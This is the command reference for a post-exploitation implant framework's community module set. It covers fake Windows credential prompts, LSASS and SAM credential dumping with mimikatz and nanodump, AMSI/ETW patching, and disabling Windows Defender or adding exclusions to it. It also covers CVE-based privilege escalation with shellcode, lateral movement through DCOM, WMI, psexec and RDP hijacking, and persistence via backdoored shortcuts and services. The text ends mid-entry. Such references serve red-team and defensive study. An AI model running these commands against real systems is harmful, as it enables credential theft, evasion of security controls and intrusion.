Community MAL
community¶
askcreds¶
Prompt for credentials
Description
Display a fake credential prompt to the user and capture entered credentials.
Usage:
askcreds
askcreds --prompt "Windows Security" --note "Please verify your credentials"
askcreds --wait_time 60
Displays a dialog box. Default wait time is 30 seconds.
askcreds [flags]
Options
-h, --help print help
--note string note to display (default "Please verify your Windows user credentials to proceed")
-f, --output_file string output file
--prompt string prompt to display (default "Restore Network Connection")
--wait_time int password to dump credentials for (default 30)
--wizard Start interactive wizard mode
autologon¶
Dump the autologon credentials
Description
Dump autologon credentials from the Windows registry.
Usage:
autologon
No arguments required.
autologon [flags]
Options
-h, --help print help
-f, --output_file string output file
--wizard Start interactive wizard mode
bof-execute_assembly¶
Execute .NET assemblies with inline execution and patching
Description
Execute .NET assemblies with inline execution and optional patching capabilities.
Examples:
bof-execute_assembly C:\Tools\Seatbelt.exe
bof-execute_assembly C:\Tools\Seatbelt.exe --amsi --etw
bof-execute_assembly C:\Tools\Rubeus.exe --args "kerberoast /outfile:hashes"
bof-execute_assembly C:\Tools\SharpHound.exe --patchexit
Legacy positional format (still supported):
bof-execute_assembly C:\Tools\Seatbelt.exe --amsi --etw AntiVirus
bof-execute_assembly C:\Tools\Rubeus.exe kerberoast /outfile:hashes --amsi
Options:
--amsi: Patch AMSI (Anti-Malware Scan Interface) before execution--etw: Patch ETW (Event Tracing for Windows) before execution--patchexit: Patch exit functions to prevent assembly from terminating the process--args: Arguments to pass to the .NET assembly
Inline execution without dropping files to disk. This technique loads and executes .NET assemblies directly in memory.
bof-execute_assembly [arguments...] [flags]
Options
--amsi Patch AMSI before execution
--args string Arguments to pass to the assembly
--etw Patch ETW before execution
-h, --help print help
-f, --output_file string output file
--patchexit Patch exit functions
--wizard Start interactive wizard mode
credman¶
Dump the Credential Manager credentials
Description
Dump credentials stored in Windows Credential Manager.
Usage:
credman
No arguments required.
credman [flags]
Options
-h, --help print help
-f, --output_file string output file
--wizard Start interactive wizard mode
curl¶
HTTP client tool
Description
HTTP client tool for making requests from the implant.
Usage:
curl --host example.com
curl --host example.com --method POST --body "data" --port 8080
All parameters use flags.
--hostis required.
curl [arguments...] [flags]
Options
--body string request body
--disable-output disable output display
--header string custom header
-h, --help print help
--host string target host
--method string HTTP method (GET, POST, PUT, PATCH, DELETE) (default "GET")
--noproxy disable proxy usage
-f, --output_file string output file
--port int target port
--useragent string custom user agent
--wizard Start interactive wizard mode
dir¶
List directory contents [path]
Description
List directory contents using BOF.
Positional arguments format:
dir C:\Users
dir C:\Windows\Temp
Flag format:
dir --path C:\Users
dir --path C:\Users --subdirs
Defaults to current working directory if no path specified.
--subdirsincludes subdirectories.
dir [arguments...] [flags]
Options
-h, --help print help
-f, --output_file string output file
--path string directory path to list
--subdirs include subdirectories (optional)
--wizard Start interactive wizard mode
dump_sam¶
Dump the SAM, SECURITY and SYSTEM registries [location]
Description
Positional arguments format:
dump_sam # Use default location (C:\Windows\Temp\)
dump_sam C:\temp\ # Specify custom location
dump_sam "C:\My Folder\" # Location with spaces
Flag format:
dump_sam --location C:\temp\
dump_sam --location "C:\My Folder\"
Requires administrator privileges
dump_sam [arguments...] [flags]
Options
-h, --help print help
--location string folder to save (optional) (default "C:\\Windows\\Temp\\")
-f, --output_file string output file
--wizard Start interactive wizard mode
elevate¶
SEE ALSO
- elevate EfsPotato - EfsPotato privilege escalation with auto CLR detection
- elevate HiveNightmare - HiveNightmare privilege escalation
- elevate JuicyPotato - JuicyPotato privilege escalation
- elevate SharpHiveNightmare - SharpHiveNightmare privilege escalation with auto CLR detection
- elevate SweetPotato - SweetPotato privilege escalation with auto CLR detection
- elevate cve-2020-0796 - CVE-2020-0796 (SMBGhost) privilege escalation
- elevate ms14-058 - MS14-058 (CVE-2014-4113) privilege escalation
- elevate ms15-051 - MS15-051 (CVE-2015-1701) privilege escalation
- elevate ms16-016 - MS16-016 (CVE-2016-0051) privilege escalation (x86 only)
- elevate ms16-032 - MS16-032 PowerShell privilege escalation
elevate EfsPotato¶
EfsPotato privilege escalation with auto CLR detection
Description
EfsPotato privilege escalation with automatic CLR version detection.
Command execution:
elevate EfsPotato --command "whoami"
elevate EfsPotato --command "powershell -enc <base64>"
Shellcode execution:
elevate EfsPotato
elevate EfsPotato --shellcode-file /path/to/sc.bin
elevate EfsPotato --shellcode-artifact beacon_x64
Priority: command > shellcode-artifact > shellcode-file > self_stager
Exploits the MS-EFSR protocol. Auto-selects .NET 3.5 or 4.0 based on system CLR version.
elevate EfsPotato [arguments...] [flags]
Options
--command string Execute a command (e.g., 'whoami', 'cmd.exe /c <cmd>')
-h, --help print help
-f, --output_file string output file
--shellcode-artifact string Artifact ID for shellcode payload
--shellcode-file string Path to raw shellcode file for injection
--wizard Start interactive wizard mode
SEE ALSO
- elevate -
elevate HiveNightmare¶
HiveNightmare privilege escalation
Description
HiveNightmare (CVE-2021-36934) privilege escalation using native EXE.
Usage:
elevate HiveNightmare
No arguments required. Exploits Volume Shadow Copy to access SAM/SYSTEM hives.
elevate HiveNightmare [flags]
Options
-h, --help print help
-f, --output_file string output file
--wizard Start interactive wizard mode
SEE ALSO
- elevate -
elevate JuicyPotato¶
JuicyPotato privilege escalation
Description
JuicyPotato privilege escalation tool.
Examples:
elevate JuicyPotato --type t --program "C:\Windows\Temp\malefic-demo.exe" --port 1116
Parameters:
--type: CreateProcess call type (t= CreateProcessWithTokenW,u= CreateProcessAsUser,*= auto)--program: Program to launch (default: cmd.exe)--port: COM server listening port (default: 1337)--clsid: CLSID for COM object (default: {8BC3F05E-D86B-11D0-A075-00C04FB68820})--arguments: Arguments to pass to the launched program
Common CLSIDs:
{8BC3F05E-D86B-11D0-A075-00C04FB68820}(BITS){BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}(Windows Media Player){03ca98d6-ff5d-49b8-abc6-03dd84127020}(Automatic Proxy Configuration)
Requires specific Windows versions and CLSID compatibility.
elevate JuicyPotato [arguments...] [flags]
Options
--arguments string Arguments to pass to the program
--clsid string CLSID to use for COM object (default "{8BC3F05E-D86B-11D0-A075-00C04FB68820}")
-h, --help print help
-f, --output_file string output file
--port string COM server listening port (default "1337")
--program string Program to launch (default "c:\\windows\\system32\\cmd.exe")
--type string CreateProcess call type (t=CreateProcessWithTokenW, u=CreateProcessAsUser, *=auto) (default "t")
--wizard Start interactive wizard mode
SEE ALSO
- elevate -
elevate SharpHiveNightmare¶
SharpHiveNightmare privilege escalation with auto CLR detection
Description
SharpHiveNightmare (CVE-2021-36934) privilege escalation.
Usage:
elevate SharpHiveNightmare
Auto-selects .NET 4.0 or 4.5 based on system CLR version. Leverages shadow copies of SAM/SYSTEM files.
elevate SharpHiveNightmare [flags]
Options
-h, --help print help
-f, --output_file string output file
--wizard Start interactive wizard mode
SEE ALSO
- elevate -
elevate SweetPotato¶
SweetPotato privilege escalation with auto CLR detection
Description
SweetPotato privilege escalation with automatic CLR version detection.
Command execution:
elevate SweetPotato --command "whoami"
elevate SweetPotato --command "powershell -enc <base64>"
Shellcode execution:
elevate SweetPotato
elevate SweetPotato --shellcode-file /path/to/sc.bin
elevate SweetPotato --shellcode-artifact beacon_x64
Advanced options (shellcode mode):
--listener-port: COM server listening port (default: 12333)--target-process: Process to spawn for injection (default: cmd.exe)
Priority: command > shellcode-artifact > shellcode-file > self_stager
elevate SweetPotato [arguments...] [flags]
Options
--command string Execute a command (e.g., 'whoami', 'cmd.exe /c <cmd>')
-h, --help print help
--listener-port string COM server listening port (default "12333")
-f, --output_file string output file
--shellcode-artifact string Artifact ID for shellcode payload
--shellcode-file string Path to raw shellcode file for injection
--target-process string Target process for shellcode injection (default "c:\\windows\\system32\\cmd.exe")
--wizard Start interactive wizard mode
SEE ALSO
- elevate -
elevate cve-2020-0796¶
CVE-2020-0796 (SMBGhost) privilege escalation
Description
CVE-2020-0796 (SMBGhost) privilege escalation exploit.
Examples:
elevate cve-2020-0796
elevate cve-2020-0796 --shellcode-file C:\payload.bin
elevate cve-2020-0796 --shellcode-artifact beacon_x64
Priority: shellcode-artifact > shellcode-file > self_stager
Requirements: x64 architecture ONLY.
Affected Systems: Windows 10 Version 1903/1909, Windows Server Version 1903/1909.
Targets the SMBv3 compression vulnerability in srv2.sys.
elevate cve-2020-0796 [arguments...] [flags]
Options
-h, --help print help
-f, --output_file string output file
--shellcode-artifact string Artifact ID for shellcode payload
--shellcode-file string Path to raw shellcode file for injection
--wizard Start interactive wizard mode
SEE ALSO
- elevate -
elevate ms14-058¶
MS14-058 (CVE-2014-4113) privilege escalation
Description
MS14-058 (CVE-2014-4113) kernel privilege escalation exploit.
Examples:
elevate ms14-058
elevate ms14-058 --shellcode-file C:\payload.bin
elevate ms14-058 --shellcode-artifact beacon_x64
Priority: shellcode-artifact > shellcode-file > self_stager
Affected Systems: Windows 7 SP1, Windows 8.1, Windows Server 2008 R2 SP1, Windows Server 2012/2012 R2.
Targets a vulnerability in win32k.sys. Supports both x86 and x64.
elevate ms14-058 [arguments...] [flags]
Options
-h, --help print help
-f, --output_file string output file
--shellcode-artifact string Artifact ID for shellcode payload
--shellcode-file string Path to raw shellcode file for injection
--wizard Start interactive wizard mode
SEE ALSO
- elevate -
elevate ms15-051¶
MS15-051 (CVE-2015-1701) privilege escalation
Description
MS15-051 (CVE-2015-1701) kernel privilege escalation exploit.
Examples:
elevate ms15-051
elevate ms15-051 --shellcode-file C:\payload.bin
elevate ms15-051 --shellcode-artifact beacon_x64
Priority: shellcode-artifact > shellcode-file > self_stager
Affected Systems: Windows 7 SP1, Windows 8.1, Windows Server 2008 R2 SP1, Windows Server 2012/2012 R2.
Targets a vulnerability in win32k.sys. Supports both x86 and x64.
elevate ms15-051 [arguments...] [flags]
Options
-h, --help print help
-f, --output_file string output file
--shellcode-artifact string Artifact ID for shellcode payload
--shellcode-file string Path to raw shellcode file for injection
--wizard Start interactive wizard mode
SEE ALSO
- elevate -
elevate ms16-016¶
MS16-016 (CVE-2016-0051) privilege escalation (x86 only)
Description
MS16-016 (CVE-2016-0051) kernel privilege escalation exploit.
Examples:
elevate ms16-016
elevate ms16-016 --shellcode-file C:\payload.bin
elevate ms16-016 --shellcode-artifact beacon_x86
Priority: shellcode-artifact > shellcode-file > self_stager
Requirements: x86 architecture ONLY (will fail on x64).
Affected Systems: Windows Vista SP2, Windows 7 SP1, Windows 8.1, Windows Server 2008/2008 R2/2012 (all x86 only).
Targets a vulnerability in WebDAV client (mrxdav.sys).
elevate ms16-016 [arguments...] [flags]
Options
-h, --help print help
-f, --output_file string output file
--shellcode-artifact string Artifact ID for shellcode payload
--shellcode-file string Path to raw shellcode file for injection
--wizard Start interactive wizard mode
SEE ALSO
- elevate -
elevate ms16-032¶
MS16-032 PowerShell privilege escalation
Description
MS16-032 (CVE-2016-0032) privilege escalation via PowerShell secondary logon handle exploit.
Usage:
elevate ms16-032
elevate ms16-032 -Command "cmd.exe /c whoami"
Uses PowerShell Invoke-MS16032 script. Affected Systems: Windows ⅞.1/10 (pre-patch), Server 2008/2012.
elevate ms16-032 [arguments...] [flags]
Options
-h, --help print help
-f, --output_file string output file
--wizard Start interactive wizard mode
SEE ALSO
- elevate -
enum¶
SEE ALSO
- enum arp - Enum ARP table
- enum av - Check for antivirus software
- enum dc - Enumerate domain information using Active Directory Domain Services
- enum dns - Enum DNS configuration
- enum dotnet_process - Find processes that most likely have .NET loaded.
- enum drives - Enumerate system drives
- enum files - Enumerate files
[keyword] - enum localcert - Enumerate local certificates
- enum localsessions - Enumerate local user sessions
- enum software - Enum software
enum arp¶
Enum ARP table
Description
Enumerate the ARP table.
Usage:
enum arp
No arguments required.
enum arp [flags]
Options
-h, --help print help
-f, --output_file string output file
--wizard Start interactive wizard mode
SEE ALSO
- enum -
enum av¶
Check for antivirus software
Description
Check for installed antivirus and security software by scanning running processes.
Usage:
enum av
No arguments required.
enum av [flags]
Options
-h, --help print help
-f, --output_file string output file
--wizard Start interactive wizard mode
SEE ALSO
- enum -
enum dc¶
Enumerate domain information using Active Directory Domain Services
Description
Enumerate domain controller information using Active Directory Domain Services.
Usage:
enum dc
No arguments required. x64 only.
enum dc [flags]
Options
-h, --help print help
-f, --output_file string output file
--wizard Start interactive wizard mode
SEE ALSO
- enum -
enum dns¶
Enum DNS configuration
Description
Enumerate DNS client configuration.
Usage:
enum dns
No arguments required.
enum dns [flags]
Options
-h, --help print help
-f, --output_file string output file
--wizard Start interactive wizard mode
SEE ALSO
- enum -
enum dotnet_process¶
Find processes that most likely have .NET loaded.
Description
Find processes that most likely have the .NET CLR loaded.
Usage:
enum dotnet_process
No arguments required.
enum dotnet_process [flags]
Options
-h, --help print help
-f, --output_file string output file
--wizard Start interactive wizard mode
SEE ALSO
- enum -
enum drives¶
Enumerate system drives
Description
Enumerate all logical drives on the system.
Usage:
enum drives
No arguments required.
enum drives [flags]
Options
-h, --help print help
-f, --output_file string output file
--wizard Start interactive wizard mode
SEE ALSO
- enum -
enum files¶
Enumerate files
Description
Enumerate files in a directory matching a pattern.
Usage:
enum files --directory C:\Users --pattern "*.txt"
enum files --directory C:\Users --pattern "*.docx" --keyword "password"
--directoryand--patternare required.--keywordis optional for content filtering.
enum files [flags]
Options
--directory string directory path to search
-h, --help print help
--keyword string optional keyword filter
-f, --output_file string output file
--pattern string search pattern (e.g., *.txt)
--wizard Start interactive wizard mode
SEE ALSO
- enum -
enum localcert¶
Enumerate local certificates
Description
Enumerate certificates in a local certificate store.
Usage:
enum localcert --store My
enum localcert --store Root
--storeis required. Common stores: My, Root, CA, Trust.
enum localcert [flags]
Options
-h, --help print help
-f, --output_file string output file
--store string certificate store name
--wizard Start interactive wizard mode
SEE ALSO
- enum -
enum localsessions¶
Enumerate local user sessions
Description
Enumerate currently logged-on user sessions.
Usage:
enum localsessions
No arguments required.
enum localsessions [flags]
Options
-h, --help print help
-f, --output_file string output file
--wizard Start interactive wizard mode
SEE ALSO
- enum -
enum software¶
Enum software
Description
Enumerate installed software on the target.
Usage:
enum software
No arguments required.
enum software [flags]
Options
-h, --help print help
-f, --output_file string output file
--wizard Start interactive wizard mode
SEE ALSO
- enum -
exclusion¶
SEE ALSO
- exclusion add - Add Windows Defender exclusion
- exclusion delete - Delete Windows Defender exclusion
- exclusion enum - Enumerate Windows Defender exclusions
exclusion add¶
Add Windows Defender exclusion
Description
Add a Windows Defender exclusion.
Usage:
exclusion add --type path --data "C:\Windows\Temp"
exclusion add --type process --data "payload.exe"
exclusion add --type extension --data ".exe"
--type(path/process/extension) and--dataare required.
exclusion add [flags]
Options
--data string exclusion data
-h, --help print help
-f, --output_file string output file
--type string exclusion type (path, process, extension)
--wizard Start interactive wizard mode
SEE ALSO
exclusion delete¶
Delete Windows Defender exclusion
Description
Delete a Windows Defender exclusion.
Usage:
exclusion delete --type path --data "C:\Windows\Temp"
exclusion delete --type process --data "payload.exe"
--type(path/process/extension) and--dataare required.
exclusion delete [flags]
Options
--data string exclusion data
-h, --help print help
-f, --output_file string output file
--type string exclusion type (path, process, extension)
--wizard Start interactive wizard mode
SEE ALSO
exclusion enum¶
Enumerate Windows Defender exclusions
Description
Enumerate current Windows Defender exclusions.
Usage:
exclusion enum
No arguments required.
exclusion enum [flags]
Options
-h, --help print help
-f, --output_file string output file
--wizard Start interactive wizard mode
SEE ALSO
execute_cross_session¶
Execute a binary on disk within the context of another logged-on user's session
Description
Execute a binary on disk within the context of another logged-on user's session.
Usage:
execute_cross_session --session_id 2 --binary_path "C:\Windows\Temp\payload.exe"
Both
--session_idand--binary_pathare required.
execute_cross_session [flags]
Options
--binary_path string path to the binary that you like to execute
-h, --help print help
-f, --output_file string output file
--session_id int the session ID of the user in which context the specified binary needs to be executed.
--wizard Start interactive wizard mode
hashdump¶
Dump the SAM, SECURITY and SYSTEM registries
Description
Dump password hashes from the SAM, SECURITY and SYSTEM registries.
Usage:
hashdump
No arguments required. Requires administrator privileges.
hashdump [flags]
Options
-h, --help print help
-f, --output_file string output file
--wizard Start interactive wizard mode
ipconfig¶
Display network configuration
Description
Display network adapter configuration.
Usage:
ipconfig
No arguments required.
ipconfig [flags]
Options
-h, --help print help
-f, --output_file string output file
--wizard Start interactive wizard mode
kill_defender¶
Kill or check Windows Defender
Description
Kill or check Windows Defender status.
Positional arguments format:
kill_defender check
kill_defender kill
Flag format:
kill_defender --action check
kill_defender --action kill
checkqueries Defender status,killattempts to terminate it. Requires elevated privileges.
kill_defender [arguments...] [flags]
Options
--action string action to perform (kill or check) (default "check")
-h, --help print help
-f, --output_file string output file
--wizard Start interactive wizard mode
klist¶
Interact with cached Kerberos tickets [action] [spn]
Description
Interact with cached Kerberos tickets.
Usage:
klist
klist --action get --spn CIFS/dc01.domain.com
klist --action purge
No action = list all tickets.
getrequests a TGS for the specified SPN.purgeclears all cached tickets.
klist [flags]
Options
--action string action to perform (get, purge, or empty to list)
-h, --help print help
-f, --output_file string output file
--spn string target SPN (required for 'get' action)
--wizard Start interactive wizard mode
ldapsearch¶
Perform LDAP search
Description
Flag format:
ldapsearch --query "(&(objectClass=user)(samAccountName=admin*))"
ldapsearch --query "(&(objectClass=computer))" --attributes "name,operatingSystem" --result-count 10
Positional arguments format:
ldapsearch "(&(objectClass=user))" "" 0 "" ""
ldapsearch "(&(objectClass=computer))" "name,operatingSystem" 10 "dc01.domain.com" "DC=domain,DC=com"
Useful queries:
Kerberoastable accounts:
ldapsearch "(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))"
AS-REP Roastable accounts:
ldapsearch "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))"
Passwords with reversible encryption:
ldapsearch "(&(objectClass=user)(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=128))"
For Bloodhound ACL data:
ldapsearch "(&(objectClass=user))" "*,ntsecuritydescriptor"
Defaults: Empty attributes = all, 0 result_count = all, empty hostname = Primary DC, empty domain = Base domain.
If paging fails, consider using nonpagedldapsearch instead.
ldapsearch [arguments...] [flags]
Options
--attributes string comma separated attributes (empty for all)
--domain string Distinguished Name to use (empty for Base domain)
-h, --help print help
--hostname string DC hostname or IP (empty for Primary DC)
-f, --output_file string output file
--query string LDAP query string
--result-count string maximum number of results (0 for all) (default "0")
--wizard Start interactive wizard mode
load_prebuild¶
load full|fs|execute|sys|rem precompiled modules
Description
Load precompiled module bundles into the current session.
Usage (positional argument required):
load_prebuild full
load_prebuild fs
load_prebuild execute
load_prebuild sys
load_prebuild rem
Argument is the module bundle name. Available: full, fs, execute, sys, rem.
load_prebuild [flags]
Options
-h, --help print help
-f, --output_file string output file
--wizard Start interactive wizard mode
logonpasswords¶
Extract logon passwords using mimikatz
Description
Extract logon passwords from LSASS using mimikatz (sekurlsa::logonpasswords).
Usage:
logonpasswords
No arguments required. Requires administrator privileges.
logonpasswords [arguments...] [flags]
Options
-h, --help print help
-f, --output_file string output file
--wizard Start interactive wizard mode
memoryinfo¶
Get system memory information
Description
Get system memory information from the target.
Usage:
memoryinfo
No arguments required.
memoryinfo [flags]
Options
-h, --help print help
-f, --output_file string output file
--wizard Start interactive wizard mode
memreader¶
Read memory from target process
Description
Read memory from a target process by searching for a pattern.
Usage:
memreader --target-pid 1234 --pattern "password"
memreader --target-pid 1234 --pattern "secret" --output-size 20
--target-pidand--patternare required. Default output-size is 10.
memreader [flags]
Options
-h, --help print help
--output-size string output size limit (default "10")
-f, --output_file string output file
--pattern string memory pattern to search
--target-pid string target process ID
--wizard Start interactive wizard mode
mimikatz¶
Execute mimikatz with specified commands
Description
Positional arguments format:
mimikatz coffee
mimikatz privilege::debug sekurlsa::logonpasswords
mimikatz "privilege::debug" "sekurlsa::logonpasswords"
Common credential extraction:
mimikatz privilege::debug sekurlsa::logonpasswords
mimikatz privilege::debug sekurlsa::wdigest
mimikatz privilege::debug sekurlsa::kerberos
Registry dumps:
mimikatz privilege::debug lsadump::sam
mimikatz privilege::debug lsadump::secrets
Other commands:
mimikatz kerberos::list
mimikatz crypto::capi
mimikatz vault::list
Most commands require administrator privileges. "exit" command is automatically appended.
mimikatz [arguments...] [flags]
Options
-h, --help print help
-f, --output_file string output file
--wizard Start interactive wizard mode
move¶
SEE ALSO
- move dcom - Execute command on remote host via DCOM
[parameters] - move krb_ptt - Submit a Kerberos TGT ticket (Pass-the-Ticket)
- move psexec - Execute service on target host using psexec
- move rdphijack - Hijack RDP session
[mode argument] - move wmi-eventsub - Execute VBScript via WMI Event Subscription
[username password domain] - move wmi-proccreate - Create process via WMI on remote host
[username password domain]
move dcom¶
Execute command on remote host via DCOM
Description
Positional arguments format:
move dcom 192.168.1.100 "c:\windows\system32\calc.exe"
move dcom DOMAIN-DC "c:\windows\system32\cmd.exe" "/c whoami"
Flag format (current user):
move dcom --target 192.168.1.100 --cmd "c:\windows\system32\calc.exe"
Flag format (explicit credentials):
move dcom --target 192.168.1.100 --username admin --password P@ssw0rd --domain CONTOSO --cmd "c:\windows\system32\cmd.exe" --parameters "/c whoami"
Uses DCOM for lateral movement. If username is empty, uses current user credentials. Default command is cmd.exe.
move dcom [arguments...] [flags]
Options
--cmd string command to execute (default "c:\\windows\\system32\\cmd.exe")
--domain string domain
-h, --help print help
-f, --output_file string output file
--parameters string command parameters
--password string password
--target string target host
--username string username (empty for current user)
--wizard Start interactive wizard mode
SEE ALSO
- move -
move krb_ptt¶
Submit a Kerberos TGT ticket (Pass-the-Ticket)
Description
Kerberos Pass-the-Ticket (PTT) - Submit a TGT or TGS ticket for authentication.
Positional arguments format:
move krb_ptt <base64_ticket>
move krb_ptt <base64_ticket> <luid>
Flag format (direct base64):
move krb_ptt --ticket <base64_ticket>
move krb_ptt --ticket <base64_ticket> --luid 0x3e7
Flag format (from file):
move krb_ptt --ticket-file /path/to/ticket.kirbi
move krb_ptt --ticket-base64-file /path/to/ticket.txt --luid 0x3e7
Parameters:
--ticket- Base64 encoded Kerberos ticket (direct input)--ticket-file- Path to raw binary ticket file (.kirbi format)--ticket-base64-file- Path to file containing base64 encoded ticket--luid- Optional target Logon Session ID (LUID)
Priority: --ticket > --ticket-base64-file > --ticket-file
Ticket sources: Rubeus (base64), Mimikatz (.kirbi), impacket (.ccache → .kirbi).
move krb_ptt [arguments...] [flags]
Options
-h, --help print help
--luid string Target LUID (Logon ID) - optional
-f, --output_file string output file
--ticket string Base64 encoded Kerberos ticket (direct input)
--ticket-base64-file string Path to base64 encoded ticket file
--ticket-file string Path to raw binary ticket file (.kirbi)
--wizard Start interactive wizard mode
SEE ALSO
- move -
move psexec¶
Execute service on target host using psexec
Description
Positional arguments format:
move psexec DOMAIN-DC AgentSvc /tmp/MyAgentSvc.exe
move psexec 192.168.1.100 TestService C:\tools\service.exe
Flag format:
move psexec --host DOMAIN-DC --service AgentSvc --path /tmp/MyAgentSvc.exe
move psexec --host 192.168.1.100 --service TestService --path C:\tools\service.exe
Requires administrator privileges on target host. Service executable will be copied to C:\Windows on target.
move psexec [arguments...] [flags]
Options
-h, --help print help
--host string target host
-f, --output_file string output file
--path string local path to service executable
--service string service name
--wizard Start interactive wizard mode
SEE ALSO
- move -
move rdphijack¶
Hijack RDP session
Description
Positional arguments format:
Redirect session 2 to session 1 (requires SYSTEM privilege):
move rdphijack 1 2
With password (requires high integrity):
move rdphijack 1 2 password P@ssw0rd123
On remote server (requires user token/ticket):
move rdphijack 1 2 server SQL01.lab.internal
Flag format:
move rdphijack --session 1 --target 2
move rdphijack --session 1 --target 2 --mode password --argument P@ssw0rd123
move rdphijack --session 1 --target 2 --mode server --argument SQL01.lab.internal
Modes:
(none)- Direct hijack, requires SYSTEM privilegepassword- Use password of target session owner, requires high integrityserver- Remote server hijack, requires token/ticket of session owner
move rdphijack [arguments...] [flags]
Options
--argument string password or server name
-h, --help print help
--mode string mode: 'password' or 'server'
-f, --output_file string output file
--session int your console session id
--target int target session id to hijack
--wizard Start interactive wizard mode
SEE ALSO
- move -
move wmi-eventsub¶
Execute VBScript via WMI Event Subscription
Description
Positional arguments format (current user):
move wmi-eventsub 192.168.1.100 /tmp/payload.vbs
Positional arguments format (explicit credentials):
move wmi-eventsub 192.168.1.100 /tmp/payload.vbs admin P@ssw0rd CONTOSO
Flag format (current user):
move wmi-eventsub --target 192.168.1.100 --script /tmp/payload.vbs
Flag format (explicit credentials):
move wmi-eventsub --target 192.168.1.100 --username admin --password P@ssw0rd --domain CONTOSO --script /tmp/payload.vbs
Uses WMI Event Subscription for persistent VBScript execution. If username is empty, uses current user credentials. x86 not supported.
move wmi-eventsub [arguments...] [flags]
Options
--domain string domain
-h, --help print help
-f, --output_file string output file
--password string password
--script string local path to VBScript file
--target string target host
--username string username (empty for current user)
--wizard Start interactive wizard mode
SEE ALSO
- move -
move wmi-proccreate¶
Create process via WMI on remote host
Description
Positional arguments format (current user):
move wmi-proccreate 192.168.1.100 "calc.exe"
move wmi-proccreate DOMAIN-DC "powershell.exe -c whoami"
Positional arguments format (explicit credentials):
move wmi-proccreate 192.168.1.100 "calc.exe" admin P@ssw0rd CONTOSO
Flag format (current user):
move wmi-proccreate --target 192.168.1.100 --command "calc.exe"
Flag format (explicit credentials):
move wmi-proccreate --target 192.168.1.100 --username admin --password P@ssw0rd --domain CONTOSO --command "powershell.exe -c whoami"
Uses WMI Win32_Process Create method. If username is empty, uses current user credentials. x86 not supported.
move wmi-proccreate [arguments...] [flags]
Options
--command string command to execute
--domain string domain
-h, --help print help
-f, --output_file string output file
--password string password
--target string target host
--username string username (empty for current user)
--wizard Start interactive wizard mode
SEE ALSO
- move -
nanodump¶
Advanced LSASS memory dumping tool
Description
Basic LSASS dump:
nanodump
Write minidump to disk with valid signature:
nanodump --valid --write --write-path C:\Windows\Temp\lsass.dmp
Use fork and spoof callstack:
nanodump --fork --spoof-callstack
Use shtinkering technique (requires admin):
nanodump --shtinkering
Get LSASS PID only:
nanodump --getpid
nanodump [flags]
Options
--chunk-size string chunk size in KB (default: 924)
--duplicate duplicate an existing LSASS handle
--duplicate-elevate duplicate and elevate handle
--elevate-handle elevate handle privileges
--fork fork the target process
--getpid get the PID of LSASS and exit
-h, --help print help
-f, --output_file string output file
--pid string target process PID (default: auto-detect LSASS)
--seclogon-duplicate use SecLogon duplicate
--seclogon-leak-local use SecLogon leak (local)
--seclogon-leak-remote use SecLogon leak (remote)
--seclogon-leak-remote-path string path for remote SecLogon leak binary
--shtinkering use LSASS shtinkering technique
--silent-process-exit use silent process exit
--silent-process-exit-path string path for silent process exit
--snapshot snapshot the target process
--spoof-callstack spoof the call stack
--valid create a minidump with a valid signature
--wizard Start interactive wizard mode
--write write minidump to disk
--write-path string path to write the minidump
net¶
SEE ALSO
- net user -
net user¶
SEE ALSO
- net -
- net user add - Add a new user account
- net user enum - Enumerate network users [type]
- net user query - Query user information
[domain]
net user add¶
Add a new user account
Description
Add a new local user account.
Usage:
net user add --username newuser --password P@ssw0rd
--usernameand--passwordare required. Requires administrator privileges.
net user add [flags]
Options
-h, --help print help
-f, --output_file string output file
--password string the password to set
--username string the username to add
--wizard Start interactive wizard mode
SEE ALSO
- net user -
net user enum¶
Enumerate network users [type]
Description
Enumerate network users by status type.
Usage:
net user enum
net user enum --type locked
net user enum --type disabled
Default type is
all. Options: all, locked, disabled, active.
net user enum [flags]
Options
-h, --help print help
-f, --output_file string output file
--type string enumeration type (all, locked, disabled, active) (default "all")
--wizard Start interactive wizard mode
SEE ALSO
- net user -
net user query¶
Query user information
Description
Query detailed information for a specific user.
Usage:
net user query --username admin
net user query --username admin --domain CONTOSO
--usernameis required.--domainis optional.
net user query [flags]
Options
--domain string domain name (optional)
-h, --help print help
-f, --output_file string output file
--username string username to query
--wizard Start interactive wizard mode
SEE ALSO
- net user -
nslookup¶
DNS lookup
Description
Positional arguments format:
nslookup www.baidu.com
nslookup www.baidu.com 8.8.8.8
nslookup www.baidu.com 8.8.8.8 CNAME
Flag format:
nslookup --host www.baidu.com
nslookup --host www.baidu.com --server 114.114.114.114
nslookup --host www.baidu.com --server 114.114.114.114 --record-type MX
nslookup [arguments...] [flags]
Options
-h, --help print help
--host string hostname or IP to lookup
-f, --output_file string output file
--record-type string DNS record type (A, NS, CNAME, MX, AAAA, etc.) (default "A")
--server string DNS server to use (optional)
--wizard Start interactive wizard mode
persistence¶
SEE ALSO
- persistence BackdoorLnk - persistence
- persistence Install_Service - persistence
- persistence Junction_Folder - persistence
- persistence NewLnk - persistence
- persistence Registry_Key - persistence via Windows Registry Key
- persistence Scheduled_Task - persistence
- persistence WMI_Event - persistence
- persistence reg_key - persistence by reg_key
- persistence startup_folder - persistence via startup folder
persistence BackdoorLnk¶
persistence
Description
Backdoor an existing LNK (shortcut) file for persistence.
Usage:
persistence BackdoorLnk --lnkpath "C:\Users\admin\Desktop\Chrome.lnk" --command "C:\payload.exe"
persistence BackdoorLnk --lnkpath "C:\Users\admin\Desktop\Chrome.lnk" --artifact_name my_beacon
--lnkpathis required. Modifies the target of an existing shortcut.
persistence BackdoorLnk [arguments...] [flags]
Options
--artifact_name string artifact name to use as payload (tab-complete supported)
--command string The new command to be set for the .lnk file.
--custom_file string local file path to use as payload
--drop_location string File path where payload is dropped
-h, --help print help
--lnkpath string The original path of the .lnk file to be replaced.
-f, --output_file string output file
--use_malefic_as_custom_file use current session's artifact as payload
--wizard Start interactive wizard mode
SEE ALSO
persistence Install_Service¶
persistence
Description
Establish persistence by installing a Windows service.
Usage:
persistence Install_Service --artifact_name my_beacon
persistence Install_Service --custom_file /path/to/payload.exe --service_name MySvc
Payload source priority:
--artifact_name>--custom_file>--use_malefic_as_custom_file.
persistence Install_Service [arguments...] [flags]
Options
--account_name string account of the service (default "LocalSystem")
--artifact_name string artifact name to use as payload (tab-complete supported)
